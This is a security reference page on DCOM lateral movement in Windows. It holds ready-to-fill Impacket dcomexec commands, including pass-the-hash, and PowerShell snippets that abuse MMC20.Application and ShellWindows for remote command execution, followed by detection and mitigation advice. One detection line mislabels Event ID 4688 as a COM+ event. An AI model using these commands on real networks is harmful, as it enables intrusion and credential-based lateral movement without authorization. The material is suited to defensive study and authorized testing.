DCOM
Overview
Distributed Component Object Model (DCOM) allows COM objects to be instantiated and called remotely over RPC (TCP 135 + dynamic ports). Several COM objects — including MMC20.Application, ShellWindows, and ShellBrowserWindow — expose methods that can execute arbitrary commands. DCOM lateral movement is less common than PsExec or WMI, which makes it less likely to be monitored.
ATT&CK Mapping
- Tactic: TA0008 - Lateral Movement
- Technique: T1021.003 - Remote Services: Distributed Component Object Model
Prerequisites
- Valid credentials with local admin rights on the target
- Network access to RPC (TCP 135 + dynamic high ports)
- DCOM enabled on the target (enabled by default)
Techniques
Impacket DCOMExec
# Impacket dcomexec
# https://github.com/fortra/impacket
# Interactive shell (default: ShellWindows)
impacket-dcomexec '<domain>/<user>:<password>@<target>'
# Execute a specific command
impacket-dcomexec '<domain>/<user>:<password>@<target>' 'whoami'
# Pass-the-hash
impacket-dcomexec '<domain>/<user>@<target>' -hashes ':<NThash>'
# Specify COM object (default is ShellWindows)
impacket-dcomexec '<domain>/<user>:<password>@<target>' 'whoami' -object MMC20
impacket-dcomexec '<domain>/<user>:<password>@<target>' 'whoami' -object ShellWindows
impacket-dcomexec '<domain>/<user>:<password>@<target>' 'whoami' -object ShellBrowserWindow
PowerShell DCOM Execution (from Windows)
# MMC20.Application — ExecuteShellCommand method
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "<target>"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami > C:\Users\Public\output.txt", "7")
# ShellWindows
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "<target>"))
$com.item().Document.Application.ShellExecute("cmd.exe", "/c whoami > C:\Users\Public\output.txt", "C:\Windows\System32", $null, 0)
Comparison with Other Methods
| Feature | DCOM | PsExec | WMIExec |
|---|---|---|---|
| Protocol | RPC (135) | SMB (445) | RPC (135) |
| Runs as | Authenticated user | SYSTEM | Authenticated user |
| File write | No | Yes (service binary) | No |
| Detection | Low | High | Low-Medium |
| Reliability | Medium | High | High |
Detection Methods
Network-Based Detection
- DCOM/RPC traffic between workstations (TCP 135 + dynamic ports)
- Unusual COM object instantiation over the network
Host-Based Detection
- Event ID 4624 (Type 3) — network logon via DCOM
- Sysmon Event ID 1 — mmc.exe or explorer.exe spawning child processes from network logon context
- Monitor for DCOM object creation events (COM+ Event ID 4688)
Mitigation Strategies
- Restrict DCOM — disable remote DCOM access where not required via
dcomcnfg.exeor GPO - Firewall rules — block RPC (TCP 135) between workstations
- Monitor DCOM activity — log and alert on remote COM object instantiation